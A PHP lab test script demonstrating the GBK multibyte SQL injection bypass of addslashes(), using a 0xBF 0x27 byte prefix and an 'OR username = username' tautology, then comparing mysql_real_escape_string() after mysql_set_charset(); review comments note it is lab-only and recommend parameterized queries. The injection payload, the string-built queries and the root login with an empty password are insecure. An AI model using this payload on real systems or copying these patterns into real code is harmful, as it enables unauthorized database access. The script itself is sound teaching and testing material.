sql_inject_test.php
<?php
// Test script: compares addslashes() with mysql_real_escape_string() on a GBK
// connection, using an input whose first two bytes are 0xBF 0x27.
// It creates and populates a `users` table in the local `test` database, so it
// is meant for a disposable lab instance only.
// NOTE(review): ext/mysql (the mysql_* functions) was deprecated in PHP 5.5 and
// removed in PHP 7.0, so this script only runs on legacy PHP.

// Declare the page as GBK so the browser renders the echoed bytes in the same
// character set that is being tested.
header('Content-Type: text/html; charset=GBK');

// Test input: byte 0xBF, then a single quote (0x27), then a tautology and a
// comment opener.
$input = chr(0xbf) . chr(0x27) . ' OR username = username; /*';

// addslashes() works byte by byte and knows nothing about the connection
// character set: it puts a backslash (0x5C) in front of the quote, producing
// 0xBF 0x5C 0x27. In GBK, 0xBF 0x5C is one valid two-byte character, so a
// GBK-decoding server absorbs the backslash and the quote is left unescaped.
$value = addslashes($input);

// This first statement is only echoed for inspection; it is never sent to the
// server ($sql is overwritten further down before the only SELECT runs).
$sql = "SELECT * FROM users WHERE username='{$value}' AND password='123123';";
echo $value;
echo '<br>';
echo $sql;
echo '<br>';

// Connects as root with an empty password to a local server; acceptable only
// on a throwaway test database.
// NOTE(review): none of the mysql_* return values below are checked, so a
// failed connect/select/query is not reported.
$c = mysql_connect("localhost", "root", "");
mysql_select_db("test", $c);

// Fixture: a GBK table with two rows. There is no IF NOT EXISTS and username
// is a PRIMARY KEY, so on a second run both statements presumably fail
// silently and the rows from the first run are reused.
mysql_query("CREATE TABLE users (
username VARCHAR(32) PRIMARY KEY,
password VARCHAR(32)
) CHARACTER SET 'GBK'", $c);
mysql_query("INSERT INTO users VALUES('foo','bar'), ('baz','test')", $c);

// Switch the connection character set through the client API. Unlike issuing
// "SET NAMES" / "SET CHARACTER SET" as a query, mysql_set_charset() also tells
// the client library which charset is in use, and mysql_real_escape_string()
// escapes according to that.
mysql_set_charset('gbk',$c);
$value = mysql_real_escape_string($input, $c);

// The query is still built by string interpolation; escaping is the only
// barrier. The robust fix is a parameterized query (PDO or mysqli prepared
// statements) with the charset set via the driver API or DSN.
$sql = "SELECT * FROM users WHERE username='{$value}' AND password='123123';";
echo $value;
echo '<br>';
echo $sql;
echo '<br>';
$res = mysql_query($sql, $c);

// Author's expectation: 2 is printed, i.e. the WHERE clause matched every row.
// NOTE(review): because the charset was set with mysql_set_charset(), whether
// the escaping is actually bypassed presumably depends on the MySQL client
// library version in use - confirm on the target setup rather than trusting
// the "2". If the query failed, $res is false and no row count is available.
echo mysql_num_rows($res); // expected by the author to print 2 (all records)
?>